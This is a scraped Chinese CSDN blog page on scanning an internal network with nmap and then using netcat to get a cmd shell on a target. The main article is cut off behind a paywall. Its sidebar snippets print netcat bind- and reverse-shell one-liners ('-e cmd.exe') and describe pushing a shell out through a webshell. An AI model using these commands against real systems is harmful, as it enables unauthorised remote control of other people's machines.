nmap配合nc拿到cmd权限

最新推荐文章于 2023-08-16 10:09:31 发布
最新推荐文章于 2023-08-16 10:09:31 发布
阅读量227 收藏 1
点赞数 2
文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53947780/article/details/119259106
版权
本文介绍了如何通过nmap进行内网扫描,确定目标主机后,结合nc工具监听并获取目标系统的cmd权限。步骤包括nmap的-sS选项扫描目标IP,黑客使用nc.exe监听4444端口,服务端通过nc工具连接黑客IP以启动cmd。一旦获得cmd,即可进行信息收集。解决方案中强调了内网nmap扫描的方法。
摘要由CSDN通过智能技术生成

第一步:在内网进行nmap扫描

nmap -sn [扫描内网网段] (直接跳过主机发现)

 

第二步:确定目标:nmap -sS 【目标IP】

最低0.47元/天 解锁文章
&捌小猪“打不掉”
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ncCMD绑定功能
09-24
nc 不想多说,带CMD绑定功能的 nc 不想多说,带CMD绑定功能的
使用nc获取cmdshell
Jim的博客
09-13 1194
NetCat简称nc 正向连接的方式就是在目标主机上绑定一个端口,当有客户端连接过来的时候就把该连接请求转向cmd.exe来处理,从而客户端获取一个类型命令提示符的执行环境 执行命令: CMD路径:c:\windows\system32\cmd.exe 1.语句:\c D:\wwwroot\case1\nc.exe -l -p 8888 -t -e cmd.exe 2.客户端直接使用te
cmdnc通信操作
m0_75259178的博客
04-30 416
我这里是来演示nc瑞士军刀同步通信,所以打开两个终端,一个cmd,服务端:nc -nv 127.0.0.1 1234。如果需要远程同行,瑞士军刀目录下,打开cmd。输入通信方的IP和端口号,如下图即可同步通信。输入命令:nc -nv IP地址 端口号。和一个在瑞士军刀目录下打开cmd的终端,客户端:输入:nc -lp 1234。
NC反弹CMD.EXE
04-20
NC反弹CMD
网络管理工具nmapnc安装使用
weixin_43824520的博客
07-02 690
nmap即(Network Mapper),是linux系统中一个常用的网络管理工具,可以扫描端口、嗅探主机所在的网络环境,以及判断网络中主机的操作系统等。 实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 nmap yum install -y nmap #查看主机当前开放的端口 nmap localhost #查看主机端口(1024-65535)中开放的端口 nmap -p 1024-65535 localhost #探测目标主机开放的端口 .
nmap-services
09-06
nmap扫描的常用的端口,端口对应的常见服务。 tcpmux 1/tcp 0.001995 # TCP Port Service Multiplexer [rfc-1078] | TCP Port Service Multiplexer tcpmux 1/udp 0.001236 # TCP Port Service Multiplexer ...
nmap 免安装版,解压直接使用
01-12
Ncap可以帮助用户捕获网络流量,进行协议分析和调试,与Nmap配合使用,可以实现更全面的网络监控和分析。 总结,Nmap是一款强大且多用途的网络扫描工具,无论是对网络安全的维护,还是对网络拓扑的了解,都是不可或...
Nmap最新版本中文使用手册
05-16
**Nmap最新版本中文使用手册** Nmap,全称“Network Mapper”,是一款强大的网络扫描工具,主要用于网络安全审计和网络发现。这款工具可以帮助用户探索网络,发现活动主机,识别服务,探测漏洞,以及进行一系列的...
nmap漏扫的全部600+脚本
09-06
nmap漏扫的全部600+脚本,"acarsd-info.nse", "address-info.nse", "afp-brute.nse", "afp-ls.nse", "afp-path-vuln.nse", "afp-serverinfo.nse", "afp-showmount.nse", "ajp-auth.nse", "ajp-brute.nse", "ajp-...
Nmap使用技巧总结-
04-01
NMap 是一款强大的网络安全扫描工具,广泛用于网络发现、漏洞检测和系统审计。本文将详细介绍NMap的一些常用命令和技巧,帮助用户快速掌握其使用方法。 **一、主机发现** 主机发现是NMap的一项基本功能,它允许...
nc端口监听工具瑞士军刀
03-11
什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多网卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装ncnmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为CSDN博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/u012486730/article/details/82019996
网络扫描工具nc&nmap
Linuxer's Blog Data
07-22 6311
一、NC 1、nc安装 # yum install nc 2、nc详解 linux nc命令   功能说明:功能强大的网络工具 语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...] 参  数:   -g   设置路由器跃程通信网关,最丢哦可设置8个。   -G   设置来源路由指向器,其数
nmapnc扫描工具
diexingtao9618的博客
09-18 1119
nmapnc扫描工具 1 使用nmapnc探测服务器信息-使用curl 查看web服务器类型 2 在centos6系统下进行提权 3 实战-通过tcpdump抓包解决服务器被黑上不了网的问题 .1.1 安装nmap命令 1、nmap概述:nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。...
webshell下使用NC反弹cmdshell
weixin_34376986的博客
03-03 346
前提: 1.能用WebShell运行cmd命令。 方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。 2.上传nc。可以跟cmd.exe上传到同一目录。 步骤: 1、本地监听一个端口。 nc -vv -l -p 8080 最好是80或8080这样的端口,被防火墙拦截的几率小很多。 2、在WebShel...
nc监控实现调用受害者cmd
08-17 213
正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击者 B 出于内网-外网的服务器 202.12.178.22 受害者 nc....
Nmap&NC食用技巧
wh00000001的博客
08-16 86
扫描例子:nmap -p- -A -sS 192.168.11.100。
NC反弹CMDSHELL提权总结
weixin_34404393的博客
03-15 560
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NCCMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去   2:然后本地执行nc -vv -lp 52进行反弹   ...
kali渗透之利用nmapnc进行扫描
m0_56988395的博客
02-18 775
基于Nmap的扫描方式 nmap -sn 192.168.60.0/24 (-sn 表示只进行PING扫描) nmap扫描类型主要有tcp的全连接扫描(会在被扫描机器留下记录),半连接扫描(不会留下记录) nmap -sS(半连接) 192.168.60.77 -p 80,81,21,25,22,110,443(端口) 三,使用NC(netcat)扫描端口 作用 1,实现TCP/UDP端口解析,nc可以作为server以TCP或UDP方式监听指定端口 2,端口的扫描,nc可以.
一些常用linux网络工具的经验共享--Tcpdump,Nmap,Netstat,nc
浮白
03-07 5400
<br />Tcpdump-转储网络上的数据流<br /><br /> Tcpdump能够截获当前所有通过本机网卡的数据包。它拥有灵活的过滤机制,可以确保得到想要的数据。由于Tcpdump 只能收集通过本机的数据,因此它的应用受到了一些限制,大多应用在网关或服务器自我检测上。例如,在作为网关的主机上,想知道本地网络中IP 地址为192.168.0.5 的主机现在与外界通信的情况,就可以使用如下命令:<br /><br /> tcpdump -i eth0 src host 192.168.0.5<
nmap扫描不到端口
最新发布
06-28
2. **防火墙或安全组阻止**:如果目标系统有防火墙规则,它可能会阻止Nmap的连接尝试,使得端口无法被扫描到。 3. **操作系统限制**:某些操作系统可能会对哪些应用程序可以监听哪些端口有限制,特别是对于根用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值